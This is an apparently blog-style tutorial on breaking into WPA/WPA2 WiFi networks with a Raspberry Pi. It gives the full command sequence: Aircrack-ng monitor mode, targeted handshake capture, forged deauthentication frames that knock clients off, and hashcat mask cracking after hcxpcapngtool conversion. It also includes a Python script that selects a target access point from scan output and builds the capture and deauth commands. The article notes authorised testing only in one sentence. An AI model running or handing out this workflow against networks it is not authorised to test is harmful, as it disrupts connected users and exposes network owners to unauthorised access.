How to Hack WiFi Networks Using Raspberry Pi

WiFi is used in almost every home and business, and for good reason: it makes internet connectivity convenient. That convenience has a price, and the price is exposure. Because WiFi is a radio link, anyone within range of your router can capture your traffic without touching a cable, and if the network's passphrase is weak they can recover it offline and join the network.

In this article I want to show you how to test your own network (or one you are explicitly authorised to test) to see how easy it is to gain access to it.

To follow along you need the following software and hardware:

Raspberry Pi 3/4 running Raspberry Pi OS

A USB WiFi adapter whose driver supports monitor mode and packet injection (injection is needed for the deauthentication step)

Capturing a WPA/WPA2 Handshake

The four-way handshake is the exchange in which a client and the router prove to each other that they hold the same key (the PMK, derived from the passphrase and the SSID) and derive the session keys that encrypt the data. The passphrase itself is never transmitted, but the handshake frames carry both nonces and a MIC computed with a key derived from the PMK, so anyone who captures the handshake can test passphrase guesses offline without ever talking to the router again.

We will make use of the penetration testing suite Aircrack-ng.

Install Aircrack-ng on your Pi

sudo apt-get update
sudo apt-get upgrade
sudo apt-get install aircrack-ng

Discover the wireless interfaces on your system

sudo airmon-ng

A list of the wireless interfaces will show up:


PHY     Interface       Driver          Chipset

phy0    wlan0           brcmfmac        Broadcom 43430
phy1    wlan1           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n

In this example we can see two wireless interfaces: wlan0 is the Pi's onboard Broadcom chip and wlan1 is a USB adapter with a Qualcomm Atheros AR9271 chipset.

We will use wlan1, since its ath9k_htc driver supports monitor mode and packet injection; the onboard brcmfmac driver does not support monitor mode.

To start monitor mode on wlan1 run the following command. If NetworkManager or wpa_supplicant keep resetting the interface, stop them first with sudo airmon-ng check kill; note that this also drops the Pi's own WiFi connection, so connect over Ethernet while you work.

sudo airmon-ng start wlan1

A monitor-mode interface will be created (typically named wlan1mon); you can see the active interfaces with the following command:

sudo iwconfig

Now we can scan the surroundings for WiFi networks with the following command:

sudo airodump-ng --write scan wlan1mon

Select the network you wish to capture packets from and note its BSSID and channel, either from the live listing or from the CSV that airodump-ng writes (--write takes a filename prefix, so the file will be scan-01.csv). Then lock the capture onto that BSSID and channel:

sudo airodump-ng wlan1mon --output-format pcap --bssid F0:9F:C0:AA:6C:B8 -c 6 --write test01

Now we will capture the WPA2-PSK handshake by forcing a connected client to reconnect. aireplay-ng sends forged deauthentication frames on behalf of the access point; the client drops off and immediately re-associates, performing a fresh four-way handshake while airodump-ng is recording. This only works if at least one client is currently connected to the network.

In a separate terminal, run the following command to send 5 bursts of deauthentication frames:

sudo aireplay-ng -0 5 -a F0:9F:C0:AA:6C:B8 wlan1mon

Now you can stop the capture and the deauthentication.

Check that the handshake was captured (airodump-ng also shows "WPA handshake: <BSSID>" in its top-right corner once it has one). Since --write test01 names the file with a sequence number, the capture is test01-01.cap:

sudo aircrack-ng test01-01.cap
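The target-selection and capture steps above, as an added example that is not part of the original article or of Aircrack-ng: it reads the access-point table out of the CSV that airodump-ng writes, picks the target by ESSID, refuses open/WEP networks (there is no WPA handshake to capture), and builds the airodump-ng and aireplay-ng command lines as argv lists so an odd ESSID can never be interpreted by a shell. The CSV text, the MAC addresses and the ESSIDs are constructed to mimic the <prefix>-01.csv layout; check the header line of your own file, since airodump-ng does not quote ESSIDs and one containing a comma would shift the columns.

```python
import csv
import shlex

# Constructed sample of an airodump-ng <prefix>-01.csv: an access-point table,
# a blank line, then the station (client) table. Real files use CRLF endings.
SAMPLE_CSV = "\r\n".join([
    "",
    "BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, "
    "Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key",
    "F0:9F:C0:AA:6C:B8, 2024-05-01 10:00:00, 2024-05-01 10:05:12,  6,  54, WPA2, CCMP, PSK, -45,      120,        0,   0.  0.  0.  0,   8, HomeWiFi, ",
    "12:34:56:78:9A:BC, 2024-05-01 10:00:03, 2024-05-01 10:05:10, 11,  54, WPA2, CCMP, PSK, -70,       80,        0,   0.  0.  0.  0,   9, Neighbour, ",
    "A0:B1:C2:D3:E4:F5, 2024-05-01 10:00:05, 2024-05-01 10:05:11,  1,  54, OPN ,     ,     , -80,       30,        0,   0.  0.  0.  0,   5, Guest, ",
    "",
    "Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs",
    "DE:AD:BE:EF:00:01, 2024-05-01 10:00:10, 2024-05-01 10:05:00, -50,       45, F0:9F:C0:AA:6C:B8, HomeWiFi",
    "",
])


def parse_access_points(text):
    """Return the access-point rows (everything before 'Station MAC') as dicts."""
    aps = []
    # splitlines() strips CRLF; skipinitialspace drops airodump's column padding.
    for row in csv.reader(text.splitlines(), skipinitialspace=True):
        if not row:
            continue
        if row[0].startswith("Station MAC"):
            break  # the client table follows; we only want access points
        if row[0] == "BSSID" or len(row) < 14:
            continue  # header line or a truncated row
        aps.append({
            "bssid": row[0].strip(),
            "channel": int(row[3]),
            "privacy": row[5].strip(),   # WPA2, WPA, WEP, OPN, ...
            "essid": row[13].strip(),
        })
    return aps


def find_target(aps, essid):
    """Pick exactly one AP by ESSID; duplicate names must be resolved by BSSID."""
    matches = [ap for ap in aps if ap["essid"] == essid]
    if len(matches) != 1:
        raise LookupError(f"{len(matches)} access points named {essid!r}; select by BSSID instead")
    return matches[0]


def attack_commands(ap, iface="wlan1mon", prefix="test01", deauths=5):
    """The two command lines from the walkthrough, as argv lists (no shell involved)."""
    if "WPA" not in ap["privacy"]:
        raise ValueError(f"{ap['essid']!r} is {ap['privacy']}: no WPA handshake to capture")
    capture = ["airodump-ng", "--output-format", "pcap",
               "--bssid", ap["bssid"], "-c", str(ap["channel"]),
               "--write", prefix, iface]
    deauth = ["aireplay-ng", "-0", str(deauths), "-a", ap["bssid"], iface]
    return capture, deauth


if __name__ == "__main__":
    target = find_target(parse_access_points(SAMPLE_CSV), "HomeWiFi")
    for argv in attack_commands(target):
        print("sudo " + shlex.join(argv))
```

Point this at a real scan-01.csv and the ESSID you own, and hand the two lists to subprocess.run (with sudo prepended) in two terminals or two processes; the capture must already be running when the deauthentication bursts go out.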

Now that you have the .cap file (test01-01.cap), copy it to a machine with a reasonable GPU that can run hashcat. The Pi's CPU can run the cracker too, but PBKDF2 with 4096 rounds per guess makes it far too slow for anything beyond a tiny wordlist.

Hashcat

We will use hashcat to crack the password. Hashcat is open source password recovery software that runs the passphrase-to-PMK derivation and the handshake MIC check on the GPU, testing many guesses in parallel.

To install hashcat on Windows, download the binaries from the hashcat website.

To install hashcat on Linux run the following command

sudo apt-get install hashcat

or download the current release archive from https://hashcat.net/hashcat/. Mode 22000, used below, requires hashcat 6.0.0 or later, so check what your distribution ships with hashcat --version before relying on the package.

Hashcat does not read the .cap file directly for mode 22000. Convert the capture first with hcxpcapngtool (from the hcxtools package), which extracts the handshake (and any PMKID it finds) into the hc22000 format:

hcxpcapngtool -o capture.hc22000 test01-01.cap

Then start the password recovery (use hashcat.exe on Windows). This example is a mask attack (-a 3) over every eight-digit numeric passphrase:

hashcat -m 22000 -a 3 capture.hc22000 ?d?d?d?d?d?d?d?d

For a dictionary attack use -a 0 with a wordlist in place of the mask. Recovered passphrases are printed again with hashcat -m 22000 --show capture.hc22000. The .hccapx format that older guides use belongs to the deprecated mode 2500 and will not load under 22000.
